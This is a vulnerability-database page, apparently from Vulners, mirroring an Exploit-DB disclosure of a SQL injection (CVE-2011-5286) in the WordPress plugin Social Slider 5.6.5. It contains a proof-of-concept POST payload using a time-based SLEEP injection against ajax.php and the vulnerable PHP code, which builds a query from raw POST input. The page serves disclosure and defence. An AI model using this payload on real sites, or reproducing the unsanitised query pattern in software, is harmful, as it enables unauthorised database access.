Lucene search
+L

WordPress Plugin Social Slider 5.6.5 - SQL Injection

🗓️ 05 Aug 2011 00:00:00Reported by Miroslav StamparType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 30 Views

WordPress Plugin Social Slider 5.6.5 SQL Injection vulnerability through ajax.ph

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2011-5286
5 Aug 201100:00
circl
CNVD
WordPress Social Slider Plugin SQL Injection Vulnerability
8 Jan 201500:00
cnvd
CVE
CVE-2011-5286
1 Jan 201502:00
cve
Cvelist
CVE-2011-5286
1 Jan 201502:00
cvelist
EUVD
EUVD-2011-5185
7 Oct 202500:30
euvd
NVD
CVE-2011-5286
1 Jan 201502:59
nvd
Patchstack
WordPress Social Slider Plugin <= 5.6.5 - SQL Injection
5 Aug 201100:00
patchstack
Prion
Sql injection
1 Jan 201502:59
prion
RedhatCVE
CVE-2011-5286
22 May 202501:54
redhatcve
WPVulnDB
Social Slider < 7.4.2 - SQL Injection
20 Jul 201100:00
wpvulndb
Rows per page
# Exploit Title: Social Slider <= 5.6.5 SQL Injection Vulnerability
# Date: 2011-08-05
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/social-slider-2.zip
# Version: 5.6.5 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/social-slider-2/ajax.php
 action=ZapiszPozycje&rA[]=1 AND SLEEP(5)

---------------
Vulnerable code
---------------
<?php
require_once(dirname(__FILE__).'/../../../wp-config.php');
global $wpdb, $table_prefix;

$SocialSliderArray = $_POST['rA'];

if (mysql_real_escape_string($_POST['action']) == "ZapiszPozycje")
    {
    $lC = 1;
    foreach ($SocialSliderArray as $recordIDValue)
        {
        $query = "UPDATE ".$table_prefix."socialslider SET lp = ".$lC." WHERE id = ".$recordIDValue;
        mysql_query($query);
        $lC = $lC + 1;
        }
    }
?>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Aug 2011 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 27.5
EPSS0.03032
30